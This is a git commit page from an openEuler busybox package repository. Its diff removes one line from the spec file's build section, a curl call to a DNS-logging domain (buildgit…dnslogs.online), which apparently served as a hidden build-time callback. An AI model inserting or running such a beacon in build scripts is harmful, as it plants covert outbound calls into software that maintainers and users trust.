diff options
author | CoprDistGit <infra@openeuler.org> | 2023-10-25 06:11:45 +0000 |
---|---|---|
committer | CoprDistGit <infra@openeuler.org> | 2023-10-25 06:11:45 +0000 |
commit | 0d6ba1b4b0ff994fc11e88974cabae744ca600fc (patch) | |
tree | deeafe7d3e8790d991e8400d348d5cf0c565be21 | |
parent | cf1760836510342df57b1d8f97c1681d8bd18346 (diff) |
automatic import of busybox
-rw-r--r-- | busybox.spec | 1 |
1 files changed, 0 insertions, 1 deletions
diff --git a/busybox.spec b/busybox.spec index 0e09285..b4cb5c3 100644 --- a/busybox.spec +++ b/busybox.spec @@ -58,7 +58,6 @@ This package contains help documentation for busybox %build export CFLAGS="$RPM_OPT_FLAGS -fPIE" LDFLAGS="-Wl,-z,now" -curl buildgit.842230e1.dns.dnslogs.online cp %{SOURCE3} .config yes "" | make oldconfig && \ cat .config && \ |